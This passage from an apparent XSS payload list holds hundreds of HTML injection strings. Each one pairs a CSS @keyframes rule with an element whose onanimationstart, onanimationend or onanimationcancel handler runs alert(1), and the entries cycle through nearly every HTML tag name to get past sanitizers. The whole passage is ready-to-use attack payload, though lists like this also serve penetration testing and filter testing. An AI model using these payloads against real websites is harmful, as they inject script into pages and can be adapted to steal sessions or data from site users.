id=x style="position:absolute;" onanimationcancel="alert(1)"></option> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><output id=x style="position:absolute;" onanimationcancel="alert(1)"></output> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><p id=x style="position:absolute;" onanimationcancel="alert(1)"></p> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><param id=x style="position:absolute;" onanimationcancel="alert(1)"></param> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><picture id=x style="position:absolute;" onanimationcancel="alert(1)"></picture> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><plaintext id=x style="position:absolute;" onanimationcancel="alert(1)"></plaintext> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><pre id=x style="position:absolute;" onanimationcancel="alert(1)"></pre> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><progress id=x style="position:absolute;" onanimationcancel="alert(1)"></progress> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><q id=x style="position:absolute;" onanimationcancel="alert(1)"></q> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rb id=x style="position:absolute;" onanimationcancel="alert(1)"></rb> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rp id=x style="position:absolute;" onanimationcancel="alert(1)"></rp> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rt id=x style="position:absolute;" onanimationcancel="alert(1)"></rt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rtc id=x style="position:absolute;" onanimationcancel="alert(1)"></rtc> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ruby id=x style="position:absolute;" onanimationcancel="alert(1)"></ruby> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><s id=x style="position:absolute;" onanimationcancel="alert(1)"></s> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><samp id=x style="position:absolute;" onanimationcancel="alert(1)"></samp> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><script id=x style="position:absolute;" onanimationcancel="alert(1)"></script> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><section id=x style="position:absolute;" onanimationcancel="alert(1)"></section> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><select id=x style="position:absolute;" onanimationcancel="alert(1)"></select> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><shadow id=x style="position:absolute;" onanimationcancel="alert(1)"></shadow> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><slot id=x style="position:absolute;" onanimationcancel="alert(1)"></slot> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><small id=x style="position:absolute;" onanimationcancel="alert(1)"></small> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><source id=x style="position:absolute;" onanimationcancel="alert(1)"></source> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><spacer id=x style="position:absolute;" onanimationcancel="alert(1)"></spacer> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><span id=x style="position:absolute;" onanimationcancel="alert(1)"></span> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strike id=x style="position:absolute;" onanimationcancel="alert(1)"></strike> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strong id=x style="position:absolute;" onanimationcancel="alert(1)"></strong> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><style id=x style="position:absolute;" onanimationcancel="alert(1)"></style> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sub id=x style="position:absolute;" onanimationcancel="alert(1)"></sub> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><summary id=x style="position:absolute;" onanimationcancel="alert(1)"></summary> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sup id=x style="position:absolute;" onanimationcancel="alert(1)"></sup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><svg id=x style="position:absolute;" onanimationcancel="alert(1)"></svg> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><table id=x style="position:absolute;" onanimationcancel="alert(1)"></table> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tbody id=x style="position:absolute;" onanimationcancel="alert(1)"></tbody> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><td id=x style="position:absolute;" onanimationcancel="alert(1)"></td> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><template id=x style="position:absolute;" onanimationcancel="alert(1)"></template> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><textarea id=x style="position:absolute;" onanimationcancel="alert(1)"></textarea> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tfoot id=x style="position:absolute;" onanimationcancel="alert(1)"></tfoot> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><th id=x style="position:absolute;" onanimationcancel="alert(1)"></th> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><thead id=x style="position:absolute;" onanimationcancel="alert(1)"></thead> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><time id=x style="position:absolute;" onanimationcancel="alert(1)"></time> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><title id=x style="position:absolute;" onanimationcancel="alert(1)"></title> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tr id=x style="position:absolute;" onanimationcancel="alert(1)"></tr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><track id=x style="position:absolute;" onanimationcancel="alert(1)"></track> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tt id=x style="position:absolute;" onanimationcancel="alert(1)"></tt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><u id=x style="position:absolute;" onanimationcancel="alert(1)"></u> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ul id=x style="position:absolute;" onanimationcancel="alert(1)"></ul> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><var id=x style="position:absolute;" onanimationcancel="alert(1)"></var> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><video id=x style="position:absolute;" onanimationcancel="alert(1)"></video> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><wbr id=x style="position:absolute;" onanimationcancel="alert(1)"></wbr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xmp id=x style="position:absolute;" onanimationcancel="alert(1)"></xmp> +<style>@keyframes x{}</style><a style="animation-name:x" onanimationend="alert(1)"></a> +<style>@keyframes x{}</style><a style="animation-name:x" onanimationstart="alert(1)"></a> +<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationend="alert(1)"></abbr> +<style>@keyframes x{}</style><abbr style="animation-name:x" onanimationstart="alert(1)"></abbr> +<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationend="alert(1)"></acronym> +<style>@keyframes x{}</style><acronym style="animation-name:x" onanimationstart="alert(1)"></acronym> +<style>@keyframes x{}</style><address style="animation-name:x" onanimationend="alert(1)"></address> +<style>@keyframes x{}</style><address style="animation-name:x" onanimationstart="alert(1)"></address> +<style>@keyframes x{}</style><applet style="animation-name:x" onanimationend="alert(1)"></applet> +<style>@keyframes x{}</style><applet style="animation-name:x" onanimationstart="alert(1)"></applet> +<style>@keyframes x{}</style><area style="animation-name:x" onanimationend="alert(1)"></area> +<style>@keyframes x{}</style><area style="animation-name:x" onanimationstart="alert(1)"></area> +<style>@keyframes x{}</style><article style="animation-name:x" onanimationend="alert(1)"></article> +<style>@keyframes x{}</style><article style="animation-name:x" onanimationstart="alert(1)"></article> +<style>@keyframes x{}</style><aside style="animation-name:x" onanimationend="alert(1)"></aside> +<style>@keyframes x{}</style><aside style="animation-name:x" onanimationstart="alert(1)"></aside> +<style>@keyframes x{}</style><audio style="animation-name:x" onanimationend="alert(1)"></audio> +<style>@keyframes x{}</style><audio style="animation-name:x" onanimationstart="alert(1)"></audio> +<style>@keyframes x{}</style><b style="animation-name:x" onanimationend="alert(1)"></b> +<style>@keyframes x{}</style><b style="animation-name:x" onanimationstart="alert(1)"></b> +<style>@keyframes x{}</style><base style="animation-name:x" onanimationend="alert(1)"></base> +<style>@keyframes x{}</style><base style="animation-name:x" onanimationstart="alert(1)"></base> +<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationend="alert(1)"></basefont> +<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationstart="alert(1)"></basefont> +<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationend="alert(1)"></bdi> +<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationstart="alert(1)"></bdi> +<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationend="alert(1)"></bdo> +<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationstart="alert(1)"></bdo> +<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationend="alert(1)"></bgsound> +<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationstart="alert(1)"></bgsound> +<style>@keyframes x{}</style><big style="animation-name:x" onanimationend="alert(1)"></big> +<style>@keyframes x{}</style><big style="animation-name:x" onanimationstart="alert(1)"></big> +<style>@keyframes x{}</style><blink style="animation-name:x" onanimationend="alert(1)"></blink> +<style>@keyframes x{}</style><blink style="animation-name:x" onanimationstart="alert(1)"></blink> +<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationend="alert(1)"></blockquote> +<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationstart="alert(1)"></blockquote> +<style>@keyframes x{}</style><body style="animation-name:x" onanimationend="alert(1)"></body> +<style>@keyframes x{}</style><body style="animation-name:x" onanimationstart="alert(1)"></body> +<style>@keyframes x{}</style><br style="animation-name:x" onanimationend="alert(1)"></br> +<style>@keyframes x{}</style><br style="animation-name:x" onanimationstart="alert(1)"></br> +<style>@keyframes x{}</style><button style="animation-name:x" onanimationend="alert(1)"></button> +<style>@keyframes x{}</style><button style="animation-name:x" onanimationstart="alert(1)"></button> +<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationend="alert(1)"></canvas> +<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationstart="alert(1)"></canvas> +<style>@keyframes x{}</style><caption style="animation-name:x" onanimationend="alert(1)"></caption> +<style>@keyframes x{}</style><caption style="animation-name:x" onanimationstart="alert(1)"></caption> +<style>@keyframes x{}</style><center style="animation-name:x" onanimationend="alert(1)"></center> +<style>@keyframes x{}</style><center style="animation-name:x" onanimationstart="alert(1)"></center> +<style>@keyframes x{}</style><cite style="animation-name:x" onanimationend="alert(1)"></cite> +<style>@keyframes x{}</style><cite style="animation-name:x" onanimationstart="alert(1)"></cite> +<style>@keyframes x{}</style><code style="animation-name:x" onanimationend="alert(1)"></code> +<style>@keyframes x{}</style><code style="animation-name:x" onanimationstart="alert(1)"></code> +<style>@keyframes x{}</style><col style="animation-name:x" onanimationend="alert(1)"></col> +<style>@keyframes x{}</style><col style="animation-name:x" onanimationstart="alert(1)"></col> +<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationend="alert(1)"></colgroup> +<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationstart="alert(1)"></colgroup> +<style>@keyframes x{}</style><command style="animation-name:x" onanimationend="alert(1)"></command> +<style>@keyframes x{}</style><command style="animation-name:x" onanimationstart="alert(1)"></command> +<style>@keyframes x{}</style><content style="animation-name:x" onanimationend="alert(1)"></content> +<style>@keyframes x{}</style><content style="animation-name:x" onanimationstart="alert(1)"></content> +<style>@keyframes x{}</style><data style="animation-name:x" onanimationend="alert(1)"></data> +<style>@keyframes x{}</style><data style="animation-name:x" onanimationstart="alert(1)"></data> +<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationend="alert(1)"></datalist> +<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationstart="alert(1)"></datalist> +<style>@keyframes x{}</style><dd style="animation-name:x" onanimationend="alert(1)"></dd> +<style>@keyframes x{}</style><dd style="animation-name:x" onanimationstart="alert(1)"></dd> +<style>@keyframes x{}</style><del style="animation-name:x" onanimationend="alert(1)"></del> +<style>@keyframes x{}</style><del style="animation-name:x" onanimationstart="alert(1)"></del> +<style>@keyframes x{}</style><details style="animation-name:x" onanimationend="alert(1)"></details> +<style>@keyframes x{}</style><details style="animation-name:x" onanimationstart="alert(1)"></details> +<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationend="alert(1)"></dfn> +<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationstart="alert(1)"></dfn> +<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationend="alert(1)"></dialog> +<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationstart="alert(1)"></dialog> +<style>@keyframes x{}</style><dir style="animation-name:x" onanimationend="alert(1)"></dir> +<style>@keyframes x{}</style><dir style="animation-name:x" onanimationstart="alert(1)"></dir> +<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div> +<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div> +<style>@keyframes x{}</style><dl style="animation-name:x" onanimationend="alert(1)"></dl> +<style>@keyframes x{}</style><dl style="animation-name:x" onanimationstart="alert(1)"></dl> +<style>@keyframes x{}</style><dt style="animation-name:x" onanimationend="alert(1)"></dt> +<style>@keyframes x{}</style><dt style="animation-name:x" onanimationstart="alert(1)"></dt> +<style>@keyframes x{}</style><element style="animation-name:x" onanimationend="alert(1)"></element> +<style>@keyframes x{}</style><element style="animation-name:x" onanimationstart="alert(1)"></element> +<style>@keyframes x{}</style><em style="animation-name:x" onanimationend="alert(1)"></em> +<style>@keyframes x{}</style><em style="animation-name:x" onanimationstart="alert(1)"></em> +<style>@keyframes x{}</style><embed style="animation-name:x" onanimationend="alert(1)"></embed> +<style>@keyframes x{}</style><embed style="animation-name:x" onanimationstart="alert(1)"></embed> +<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationend="alert(1)"></fieldset> +<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationstart="alert(1)"></fieldset> +<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationend="alert(1)"></figcaption> +<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationstart="alert(1)"></figcaption> +<style>@keyframes x{}</style><figure style="animation-name:x" onanimationend="alert(1)"></figure> +<style>@keyframes x{}</style><figure style="animation-name:x" onanimationstart="alert(1)"></figure> +<style>@keyframes x{}</style><font style="animation-name:x" onanimationend="alert(1)"></font> +<style>@keyframes x{}</style><font style="animation-name:x" onanimationstart="alert(1)"></font> +<style>@keyframes x{}</style><footer style="animation-name:x" onanimationend="alert(1)"></footer> +<style>@keyframes x{}</style><footer style="animation-name:x" onanimationstart="alert(1)"></footer> +<style>@keyframes x{}</style><form style="animation-name:x" onanimationend="alert(1)"></form> +<style>@keyframes x{}</style><form style="animation-name:x" onanimationstart="alert(1)"></form> +<style>@keyframes x{}</style><frame style="animation-name:x" onanimationend="alert(1)"></frame> +<style>@keyframes x{}</style><frame style="animation-name:x" onanimationstart="alert(1)"></frame> +<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationend="alert(1)"></frameset> +<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationstart="alert(1)"></frameset> +<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationend="alert(1)"></h1> +<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationstart="alert(1)"></h1> +<style>@keyframes x{}</style><head style="animation-name:x" onanimationend="alert(1)"></head> +<style>@keyframes x{}</style><head style="animation-name:x" onanimationstart="alert(1)"></head> +<style>@keyframes x{}</style><header style="animation-name:x" onanimationend="alert(1)"></header> +<style>@keyframes x{}</style><header style="animation-name:x" onanimationstart="alert(1)"></header> +<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationend="alert(1)"></hgroup> +<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationstart="alert(1)"></hgroup> +<style>@keyframes x{}</style><hr style="animation-name:x" onanimationend="alert(1)"></hr> +<style>@keyframes x{}</style><hr style="animation-name:x" onanimationstart="alert(1)"></hr> +<style>@keyframes x{}</style><html style="animation-name:x" onanimationend="alert(1)"></html> +<style>@keyframes x{}</style><html style="animation-name:x" onanimationstart="alert(1)"></html> +<style>@keyframes x{}</style><i style="animation-name:x" onanimationend="alert(1)"></i> +<style>@keyframes x{}</style><i style="animation-name:x" onanimationstart="alert(1)"></i> +<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationend="alert(1)"></iframe> +<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationstart="alert(1)"></iframe> +<style>@keyframes x{}</style><image style="animation-name:x" onanimationend="alert(1)"></image> +<style>@keyframes x{}</style><image style="animation-name:x" onanimationstart="alert(1)"></image> +<style>@keyframes x{}</style><img style="animation-name:x" onanimationend="alert(1)"></img> +<style>@keyframes x{}</style><img style="animation-name:x" onanimationstart="alert(1)"></img> +<style>@keyframes x{}</style><input style="animation-name:x" onanimationend="alert(1)"></input> +<style>@keyframes x{}</style><input style="animation-name:x" onanimationstart="alert(1)"></input> +<style>@keyframes x{}</style><ins style="animation-name:x" onanimationend="alert(1)"></ins> +<style>@keyframes x{}</style><ins style="animation-name:x" onanimationstart="alert(1)"></ins> +<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationend="alert(1)"></isindex> +<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationstart="alert(1)"></isindex> +<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationend="alert(1)"></kbd> +<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationstart="alert(1)"></kbd> +<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationend="alert(1)"></keygen> +<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationstart="alert(1)"></keygen> +<style>@keyframes x{}</style><label style="animation-name:x" onanimationend="alert(1)"></label> +<style>@keyframes x{}</style><label style="animation-name:x" onanimationstart="alert(1)"></label> +<style>@keyframes x{}</style><legend style="animation-name:x" onanimationend="alert(1)"></legend> +<style>@keyframes x{}</style><legend style="animation-name:x" onanimationstart="alert(1)"></legend> +<style>@keyframes x{}</style><li style="animation-name:x" onanimationend="alert(1)"></li> +<style>@keyframes x{}</style><li style="animation-name:x" onanimationstart="alert(1)"></li> +<style>@keyframes x{}</style><link style="animation-name:x" onanimationend="alert(1)"></link> +<style>@keyframes x{}</style><link style="animation-name:x" onanimationstart="alert(1)"></link> +<style>@keyframes x{}</style><listing style="animation-name:x" onanimationend="alert(1)"></listing> +<style>@keyframes x{}</style><listing style="animation-name:x" onanimationstart="alert(1)"></listing> +<style>@keyframes x{}</style><main style="animation-name:x" onanimationend="alert(1)"></main> +<style>@keyframes x{}</style><main style="animation-name:x" onanimationstart="alert(1)"></main> +<style>@keyframes x{}</style><map style="animation-name:x" onanimationend="alert(1)"></map> +<style>@keyframes x{}</style><map style="animation-name:x" onanimationstart="alert(1)"></map> +<style>@keyframes x{}</style><mark style="animation-name:x" onanimationend="alert(1)"></mark> +<style>@keyframes x{}</style><mark style="animation-name:x" onanimationstart="alert(1)"></mark> +<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationend="alert(1)"></marquee> +<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationstart="alert(1)"></marquee> +<style>@keyframes x{}</style><menu style="animation-name:x" onanimationend="alert(1)"></menu> +<style>@keyframes x{}</style><menu style="animation-name:x" onanimationstart="alert(1)"></menu> +<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationend="alert(1)"></menuitem> +<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationstart="alert(1)"></menuitem> +<style>@keyframes x{}</style><meta style="animation-name:x" onanimationend="alert(1)"></meta> +<style>@keyframes x{}</style><meta style="animation-name:x" onanimationstart="alert(1)"></meta> +<style>@keyframes x{}</style><meter style="animation-name:x" onanimationend="alert(1)"></meter> +<style>@keyframes x{}</style><meter style="animation-name:x" onanimationstart="alert(1)"></meter> +<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationend="alert(1)"></multicol> +<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationstart="alert(1)"></multicol> +<style>@keyframes x{}</style><nav style="animation-name:x" onanimationend="alert(1)"></nav> +<style>@keyframes x{}</style><nav style="animation-name:x" onanimationstart="alert(1)"></nav> +<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationend="alert(1)"></nextid> +<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationstart="alert(1)"></nextid> +<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationend="alert(1)"></nobr> +<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationstart="alert(1)"></nobr> +<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationend="alert(1)"></noembed> +<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationstart="alert(1)"></noembed> +<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationend="alert(1)"></noframes> +<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationstart="alert(1)"></noframes> +<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationend="alert(1)"></noscript> +<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationstart="alert(1)"></noscript> +<style>@keyframes x{}</style><object style="animation-name:x" onanimationend="alert(1)"></object> +<style>@keyframes x{}</style><object style="animation-name:x" onanimationstart="alert(1)"></object> +<style>@keyframes x{}</style><ol style="animation-name:x" onanimationend="alert(1)"></ol> +<style>@keyframes x{}</style><ol style="animation-name:x" onanimationstart="alert(1)"></ol> +<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationend="alert(1)"></optgroup> +<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationstart="alert(1)"></optgroup> +<style>@keyframes x{}</style><option style="animation-name:x" onanimationend="alert(1)"></option> +<style>@keyframes x{}</style><option style="animation-name:x" onanimationstart="alert(1)"></option> +<style>@keyframes x{}</style><output style="animation-name:x" onanimationend="alert(1)"></output> +<style>@keyframes x{}</style><output style="animation-name:x" onanimationstart="alert(1)"></output> +<style>@keyframes x{}</style><p style="animation-name:x" onanimationend="alert(1)"></p> +<style>@keyframes x{}</style><p style="animation-name:x" onanimationstart="alert(1)"></p> +<style>@keyframes x{}</style><param style="animation-name:x" onanimationend="alert(1)"></param> +<style>@keyframes x{}</style><param style="animation-name:x" onanimationstart="alert(1)"></param> +<style>@keyframes x{}</style><picture style="animation-name:x" onanimationend="alert(1)"></picture> +<style>@keyframes x{}</style><picture style="animation-name:x" onanimationstart="alert(1)"></picture> +<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationend="alert(1)"></plaintext> +<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationstart="alert(1)"></plaintext> +<style>@keyframes x{}</style><pre style="animation-name:x" onanimationend="alert(1)"></pre> +<style>@keyframes x{}</style><pre style="animation-name:x" onanimationstart="alert(1)"></pre> +<style>@keyframes x{}</style><progress style="animation-name:x" onanimationend="alert(1)"></progress> +<style>@keyframes x{}</style><progress style="animation-name:x" onanimationstart="alert(1)"></progress> +<style>@keyframes x{}</style><q style="animation-name:x" onanimationend="alert(1)"></q> +<style>@keyframes x{}</style><q style="animation-name:x" onanimationstart="alert(1)"></q> +<style>@keyframes x{}</style><rb style="animation-name:x" onanimationend="alert(1)"></rb> +<style>@keyframes x{}</style><rb style="animation-name:x" onanimationstart="alert(1)"></rb> +<style>@keyframes x{}</style><rp style="animation-name:x" onanimationend="alert(1)"></rp> +<style>@keyframes x{}</style><rp style="animation-name:x" onanimationstart="alert(1)"></rp> +<style>@keyframes x{}</style><rt style="animation-name:x" onanimationend="alert(1)"></rt> +<style>@keyframes x{}</style><rt style="animation-name:x" onanimationstart="alert(1)"></rt> +<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationend="alert(1)"></rtc> +<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationstart="alert(1)"></rtc> +<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationend="alert(1)"></ruby> +<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationstart="alert(1)"></ruby> +<style>@keyframes x{}</style><s style="animation-name:x" onanimationend="alert(1)"></s> +<style>@keyframes x{}</style><s style="animation-name:x" onanimationstart="alert(1)"></s> +<style>@keyframes x{}</style><samp style="animation-name:x" onanimationend="alert(1)"></samp> +<style>@keyframes x{}</style><samp style="animation-name:x" onanimationstart="alert(1)"></samp> +<style>@keyframes x{}</style><script style="animation-name:x" onanimationend="alert(1)"></script> +<style>@keyframes x{}</style><script style="animation-name:x" onanimationstart="alert(1)"></script> +<style>@keyframes x{}</style><section style="animation-name:x" onanimationend="alert(1)"></section> +<style>@keyframes x{}</style><section style="animation-name:x" onanimationstart="alert(1)"></section> +<style>@keyframes x{}</style><select style="animation-name:x" onanimationend="alert(1)"></select> +<style>@keyframes x{}</style><select style="animation-name:x" onanimationstart="alert(1)"></select> +<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationend="alert(1)"></shadow> +<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationstart="alert(1)"></shadow> +<style>@keyframes x{}</style><slot style="animation-name:x" onanimationend="alert(1)"></slot> +<style>@keyframes x{}</style><slot style="animation-name:x" onanimationstart="alert(1)"></slot> +<style>@keyframes x{}</style><small style="animation-name:x" onanimationend="alert(1)"></small> +<style>@keyframes x{}</style><small style="animation-name:x" onanimationstart="alert(1)"></small> +<style>@keyframes x{}</style><source style="animation-name:x" onanimationend="alert(1)"></source> +<style>@keyframes x{}</style><source style="animation-name:x" onanimationstart="alert(1)"></source> +<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationend="alert(1)"></spacer> +<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationstart="alert(1)"></spacer> +<style>@keyframes x{}</style><span style="animation-name:x" onanimationend="alert(1)"></span> +<style>@keyframes x{}</style><span style="animation-name:x" onanimationstart="alert(1)"></span> +<style>@keyframes x{}</style><strike style="animation-name:x" onanimationend="alert(1)"></strike> +<style>@keyframes x{}</style><strike style="animation-name:x" onanimationstart="alert(1)"></strike> +<style>@keyframes x{}</style><strong style="animation-name:x" onanimationend="alert(1)"></strong> +<style>@keyframes x{}</style><strong style="animation-name:x" onanimationstart="alert(1)"></strong> +<style>@keyframes x{}</style><style style="animation-name:x" onanimationend="alert(1)"></style> +<style>@keyframes x{}</style><style style="animation-name:x" onanimationstart="alert(1)"></style> +<style>@keyframes x{}</style><sub style="animation-name:x" onanimationend="alert(1)"></sub> +<style>@keyframes x{}</style><sub style="animation-name:x" onanimationstart="alert(1)"></sub> +<style>@keyframes x{}</style><summary style="animation-name:x" onanimationend="alert(1)"></summary> +<style>@keyframes x{}</style><summary style="animation-name:x" onanimationstart="alert(1)"></summary> +<style>@keyframes x{}</style><sup style="animation-name:x" onanimationend="alert(1)"></sup> +<style>@keyframes x{}</style><sup style="animation-name:x" onanimationstart="alert(1)"></sup> +<style>@keyframes x{}</style><svg style="animation-name:x" onanimationend="alert(1)"></svg> +<style>@keyframes x{}</style><svg style="animation-name:x" onanimationstart="alert(1)"></svg> +<style>@keyframes x{}</style><table style="animation-name:x" onanimationend="alert(1)"></table> +<style>@keyframes x{}</style><table style="animation-name:x" onanimationstart="alert(1)"></table> +<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationend="alert(1)"></tbody> +<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationstart="alert(1)"></tbody> +<style>@keyframes x{}</style><td style="animation-name:x" onanimationend="alert(1)"></td> +<style>@keyframes x{}</style><td style="animation-name:x" onanimationstart="alert(1)"></td> +<style>@keyframes x{}</style><template style="animation-name:x" onanimationend="alert(1)"></template> 